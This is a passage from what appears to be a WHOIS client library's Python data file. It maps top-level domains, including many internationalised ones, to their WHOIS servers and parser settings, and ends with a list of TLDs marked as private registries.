\"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"xn--qxa6a\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"xn--rvc1e0am3e\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--s9brj9c\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--ses554g\"] = {\"_server\": \"whois.nic.xn--ses554g\", \"extend\": \"com\", \"_test\": \"nic.xn--ses554g\"}\nZZ[\"xn--t60b56a\"] = {\"_server\": \"whois.nic.xn--t60b56a\", \"extend\": \"com\", \"_test\": \"nic.xn--t60b56a\"}\nZZ[\"xn--tckwe\"] = {\"_server\": \"whois.nic.xn--tckwe\", \"extend\": \"com\", \"_test\": \"nic.xn--tckwe\"}\nZZ[\"xn--tiq49xqyj\"] = {\"_server\": \"whois.nic.xn--tiq49xqyj\", \"extend\": \"com\", \"_test\": \"nic.xn--tiq49xqyj\"}\nZZ[\"xn--unup4y\"] = {\"_server\": \"whois.nic.xn--unup4y\", \"extend\": \"com\", \"_test\": \"nic.xn--unup4y\"}\nZZ[\"xn--vermgensberater-ctb\"] = {\"_server\": \"whois.nic.xn--vermgensberater-ctb\", \"extend\": \"com\", \"_test\": \"nic.xn--vermgensberater-ctb\"}\nZZ[\"xn--vermgensberatung-pwb\"] = {\"_server\": \"whois.nic.xn--vermgensberatung-pwb\", \"extend\": \"com\", \"_test\": \"nic.xn--vermgensberatung-pwb\"}\nZZ[\"xn--vhquv\"] = {\"_server\": \"whois.nic.xn--vhquv\", \"extend\": \"com\", \"_test\": \"nic.xn--vhquv\"}\nZZ[\"xn--vuq861b\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"xn--w4r85el8fhu5dnra\"] = {\"_server\": \"whois.nic.xn--w4r85el8fhu5dnra\", \"extend\": \"com\", \"_test\": \"nic.xn--w4r85el8fhu5dnra\"}\nZZ[\"xn--w4rs40l\"] = {\"_server\": \"whois.nic.xn--w4rs40l\", \"extend\": \"com\", \"_test\": \"nic.xn--w4rs40l\"}\nZZ[\"xn--wgbl6a\"] = {\"_server\": \"whois.registry.qa\", \"extend\": \"qa\", \"_test\": \"registry.qa\"}\nZZ[\"xn--xhq521b\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"xn--xkc2dl3a5ee0h\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"xn--yfro4i67o\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"xxx\"] = {\"_server\": \"whois.nic.xxx\", \"extend\": \"com\", \"_test\": \"nic.xxx\"}\nZZ[\"xyz\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.nic.xyz\", \"_test\": \"nic.xyz\"}\nZZ[\"yachts\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"yamaxun\"] = {\"_server\": \"whois.nic.yamaxun\", \"extend\": \"com\", \"_test\": \"nic.yamaxun\"}\nZZ[\"ye\"] = {\"extend\": \"com\", \"_server\": \"whois.y.net.ye\", \"_test\": \"net.ye\"}\nZZ[\"yodobashi\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"yoga\"] = {\"_server\": \"whois.nic.yoga\", \"extend\": \"com\", \"_test\": \"nic.yoga\"}\nZZ[\"yokohama\"] = {\"_server\": \"whois.nic.yokohama\", \"extend\": \"com\", \"_test\": \"nic.yokohama\"}\nZZ[\"you\"] = {\"_server\": \"whois.nic.you\", \"extend\": \"com\", \"_test\": \"nic.you\"}\nZZ[\"youtube\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"yt\"] = {\"extend\": \"re\", \"_server\": \"whois.nic.yt\", \"_test\": \"nic.yt\"}\nZZ[\"yun\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"za\"] = {\"extend\": \"com\"}\nZZ[\"zappos\"] = {\"_server\": \"whois.nic.zappos\", \"extend\": \"com\", \"_test\": \"nic.zappos\"}\nZZ[\"zara\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"zip\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.zip\", \"_test\": \"nic.zip\"}\nZZ[\"zm\"] = {\"extend\": \"com\"}\nZZ[\"zone\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"zuerich\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"zw\"] = {\"extend\": \"_privateReg\"} # Zimbabwe\nZZ[\"ευ\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"ею\"] = {\"_server\": \"whois.eu\", \"extend\": \"eu\"}\nZZ[\"католик\"] = {\"_server\": \"whois.nic.xn--80aqecdr1a\", \"extend\": \"xn--80aqecdr1a\"}\nZZ[\"ком\"] = {\"_server\": \"whois.nic.xn--j1aef\", \"extend\": \"xn--j1aef\"}\nZZ[\"мкд\"] = {\"_server\": \"whois.marnet.mk\", \"extend\": \"mk\"}\nZZ[\"москва\"] = {\"_server\": \"whois.nic.xn--80adxhks\", \"extend\": \"xn--80adxhks\"}\nZZ[\"онлайн\"] = {\"extend\": \"com\"}\nZZ[\"орг\"] = {\"_server\": \"whois.nic.xn--c1avg\", \"extend\": \"xn--c1avg\"}\nZZ[\"рус\"] = {\"extend\": \"com\"}\nZZ[\"рф\"] = {\"extend\": \"ru\"}\nZZ[\"сайт\"] = {\"_server\": \"whois.nic.xn--80aswg\", \"extend\": \"xn--80aswg\"}\nZZ[\"קום\"] = {\"_server\": \"whois.nic.xn--9dbq2a\", \"extend\": \"xn--9dbq2a\"}\nZZ[\"ابوظبي\"] = {\"_server\": \"whois.nic.xn--mgbca7dzdo\", \"extend\": \"xn--mgbca7dzdo\"}\nZZ[\"اتصالات\"] = {\"_server\": \"whois.centralnic.com\", \"extend\": \"_centralnic\"}\nZZ[\"العليان\"] = {\"_server\": \"whois.nic.xn--mgba7c0bbn0a\", \"extend\": \"xn--mgba7c0bbn0a\"}\nZZ[\"بارت\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"بازار\"] = {\"_server\": \"whois.nic.xn--mgbab2bd\", \"extend\": \"xn--mgbab2bd\"}\nZZ[\"بھارت\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"بيتك\"] = {\"_server\": \"whois.nic.xn--ngbe9e0a\", \"extend\": \"xn--ngbe9e0a\"}\nZZ[\"ڀارت\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"com\"}\nZZ[\"سورية\"] = {\"_server\": \"whois.tld.sy\", \"extend\": \"sy\"}\nZZ[\"شبكة\"] = {\"_server\": \"whois.nic.xn--ngbc5azd\", \"extend\": \"xn--ngbc5azd\"}\nZZ[\"عرب\"] = {\"_server\": \"whois.nic.xn--ngbrx\", \"extend\": \"xn--ngbrx\"}\nZZ[\"عمان\"] = {\"_server\": \"whois.registry.om\", \"extend\": \"om\"}\nZZ[\"قطر\"] = {\"_server\": \"whois.registry.qa\", \"extend\": \"qa\"}\nZZ[\"كاثوليك\"] = {\"_server\": \"whois.nic.xn--mgbi4ecexp\", \"extend\": \"xn--mgbi4ecexp\"}\nZZ[\"كوم\"] = {\"_server\": \"whois.nic.xn--fhbei\", \"extend\": \"xn--fhbei\"}\nZZ[\"موريتانيا\"] = {\"_server\": \"whois.nic.mr\", \"extend\": \"mr\"}\nZZ[\"موقع\"] = {\"_server\": \"whois.nic.xn--4gbrim\", \"extend\": \"xn--4gbrim\"}\nZZ[\"همراه\"] = {\"_server\": \"whois.nic.xn--mgbt3dhd\", \"extend\": \"xn--mgbt3dhd\"}\nZZ[\"कम\"] = {\"_server\": \"whois.nic.xn--11b4c3d\", \"extend\": \"xn--11b4c3d\"}\nZZ[\"नट\"] = {\"_server\": \"whois.nic.xn--c2br7g\", \"extend\": \"xn--c2br7g\"}\nZZ[\"भरत\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"भरत\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"भरतम\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"सगठन\"] = {\"_server\": \"whois.nic.xn--i1b6b1a6a2e\", \"extend\": \"xn--i1b6b1a6a2e\"}\nZZ[\"ভরত\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ভৰত\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ਭਰਤ\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ભરત\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ଭରତ\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"இநதய\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"சஙகபபர\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"భరత\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ಭರತ\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"ഭരത\"] = {\"_server\": \"whois.registry.in\", \"extend\": \"in\"}\nZZ[\"คอม\"] = {\"_server\": \"whois.nic.xn--42c2d9a\", \"extend\": \"xn--42c2d9a\"} #\nZZ[\"ไทย\"] = {\"_server\": \"whois.thnic.co.th\", \"extend\": \"co.th\"}\nZZ[\"アマゾン\"] = {\"_server\": \"whois.nic.xn--cckwcxetd\", \"extend\": \"xn--cckwcxetd\"}\nZZ[\"グーグル\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"コム\"] = {\"_server\": \"whois.nic.xn--tckwe\", \"extend\": \"xn--tckwe\"}\nZZ[\"みんな\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"中信\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"中国\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"xn--fiqs8s\"}\nZZ[\"中國\"] = {\"_server\": \"whois.cnnic.cn\", \"extend\": \"xn--fiqs8s\"}\nZZ[\"中文网\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"亚马逊\"] = {\"_server\": \"whois.nic.xn--jlq480n2rg\", \"extend\": \"xn--jlq480n2rg\"}\nZZ[\"企业\"] = {\"_server\": \"whois.nic.xn--vhquv\", \"extend\": \"xn--vhquv\"}\nZZ[\"佛山\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"信息\"] = {\"_server\": \"whois.teleinfo.cn\", \"extend\": \"_teleinfo\"}\nZZ[\"八卦\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"公司\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"台湾\"] = {\"_server\": \"whois.twnic.net.tw\", \"extend\": \"tw\", \"_test\": \"google.台湾\"}\nZZ[\"台灣\"] = {\"_server\": \"whois.twnic.net.tw\", \"extend\": \"tw\", \"_test\": \"google.台灣\"}\nZZ[\"商城\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"商店\"] = {\"_server\": \"whois.nic.xn--czrs0t\", \"extend\": \"xn--czrs0t\"}\nZZ[\"嘉里\"] = {\"_server\": \"whois.nic.xn--w4rs40l\", \"extend\": \"xn--w4rs40l\"}\nZZ[\"嘉里大酒店\"] = {\"_server\": \"whois.nic.xn--w4r85el8fhu5dnra\", \"extend\": \"xn--w4r85el8fhu5dnra\"}\nZZ[\"在线\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"大拿\"] = {\"_server\": \"whois.nic.xn--pssy2u\", \"extend\": \"xn--pssy2u\"}\nZZ[\"天主教\"] = {\"_server\": \"whois.nic.xn--tiq49xqyj\", \"extend\": \"xn--tiq49xqyj\"}\nZZ[\"娱乐\"] = {\"_server\": \"whois.nic.xn--fjq720a\", \"extend\": \"xn--fjq720a\"}\nZZ[\"广东\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\"}\nZZ[\"微博\"] = {\"_server\": \"whois.nic.xn--9krt00a\", \"extend\": \"xn--9krt00a\"}\nZZ[\"慈善\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"我爱你\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"手机\"] = {\"_server\": \"whois.nic.xn--kput3i\", \"extend\": \"xn--kput3i\"}\nZZ[\"政府\"] = {\"_server\": \"whois.nic.xn--mxtq1m\", \"extend\": \"xn--mxtq1m\"}\nZZ[\"新加坡\"] = {\"_server\": \"whois.sgnic.sg\", \"extend\": \"sg\"}\nZZ[\"新闻\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"时尚\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"机构\"] = {\"_server\": \"whois.nic.xn--nqv7f\", \"extend\": \"xn--nqv7f\"}\nZZ[\"淡马锡\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"游戏\"] = {\"_server\": \"whois.nic.xn--unup4y\", \"extend\": \"xn--unup4y\"}\nZZ[\"澳門\"] = {\"_server\": \"whois.monic.mo\", \"extend\": \"mo\"}\nZZ[\"点看\"] = {\"_server\": \"whois.nic.xn--3pxu8k\", \"extend\": \"xn--3pxu8k\"}\nZZ[\"移动\"] = {\"_server\": \"whois.nic.xn--6frz82g\", \"extend\": \"xn--6frz82g\"}\nZZ[\"组织机构\"] = {\"_server\": \"whois.nic.xn--nqv7fs00ema\", \"extend\": \"xn--nqv7fs00ema\"}\nZZ[\"网址\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"网店\"] = {\"extend\": \"_gtldKnet\", \"_server\": \"whois.gtld.knet.cn\", \"_test\": None}\nZZ[\"网站\"] = {\"_server\": \"whois.nic.xn--5tzm5g\", \"extend\": \"xn--5tzm5g\"}\nZZ[\"网络\"] = {\"_server\": \"whois.ngtld.cn\", \"extend\": \"com\", \"_test\": \"ngtld.cn\"}\nZZ[\"联通\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"谷歌\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"集团\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": None}\nZZ[\"電訊盈科\"] = {\"_server\": \"whois.nic.xn--fzys8d69uvgm\", \"extend\": \"xn--fzys8d69uvgm\"}\nZZ[\"飞利浦\"] = {\"_server\": \"whois.nic.xn--kcrx77d1x4a\", \"extend\": \"xn--kcrx77d1x4a\"}\nZZ[\"香格里拉\"] = {\"_server\": \"whois.nic.xn--5su34j936bgsg\", \"extend\": \"xn--5su34j936bgsg\", \"_test\": \"nic.xn--5su34j936bgsg\"}\nZZ[\"香港\"] = {\"_server\": \"whois.hkirc.hk\", \"extend\": \"hk\", \"_test\": \"hkirc.hk\"}\n\n# भारतम् xn--h2breg3eve ; still issues with some utf8 strings 2023-08-28 mboot\n\nZZ[\"aaa\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"able\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"accenture\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ad\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aetna\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aig\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"americanexpress\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"amex\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"amica\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"analytics\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ao\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aq\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"aramco\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"athleta\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"axa\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"azure\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"banamex\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bananarepublic\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"baseball\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bb\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bharti\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bing\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bloomberg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"booking\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bs\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"bv\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"calvinklein\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"caravan\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cbn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cbre\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"chase\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cisco\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"citadel\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"citi\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"citic\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ck\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"coupon\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"cu\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dell\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dhl\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"discover\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"dupont\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"er\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"farmers\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ferrero\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"fk\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"flickr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"flir\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"food\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ford\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"frontier\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ftr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gap\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gb\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"grainger\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"grocery\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gu\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"guardian\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"gw\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hbo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"homegoods\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"homesense\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hotels\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hotmail\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hsbc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"hyatt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ieee\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"intuit\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ipiranga\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"itau\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jmp\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jnj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jpmorgan\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"jprs\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kinder\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"km\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kp\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kpmg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kpn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"kw\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lanxess\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lifeinsurance\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lilly\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lincoln\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"living\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"lr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"maif\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"marshalls\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mattel\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"merckmsd\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"microsoft\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mil\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mint\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mlb\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"moto\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"msd\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"mv\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nba\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ne\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"netflix\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"neustar\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nfl\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ni\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nike\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"nr\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ntt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"office\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"oldnavy\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"open\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pfizer\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pictet\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"ping\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pn\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pramerica\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"praxi\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"pru\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"prudential\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"rocher\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sakura\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sas\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sener\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"skype\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sohu\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"song\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"staples\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"statefarm\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"sz\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"target\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tj\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tjmaxx\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tjx\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"tkmaxx\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"vi\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"vivo\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"weather\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"weatherchannel\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"williamhill\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"windows\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"winners\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xbox\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--1ck2e1b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--54b7fta0cc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--bck1b9a5dre4c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--cck2b3b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--czr694b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--eckvdtc9d\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--fct429k\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--fzc2c9e2c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--g2xx48c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--gckr3f0f\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--gk3at1e\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--imr513n\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--jvr189m\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--l1acc\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgba3a3ejt\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbai9azgqp6j\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbayh7gpa\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbc0a9azcg\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbcpq6gpa1a\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--mgbpl2fh\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--nyqy26a\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--otu796d\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--qxam\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--rhqv96g\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--rovu88b\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--wgbh1c\"] = {\"_privateRegistry\": True} # no whois server found in iana\nZZ[\"xn--xkc2al3hye2a\"] = {\"_privateRegistry\": True} # no whois server found in 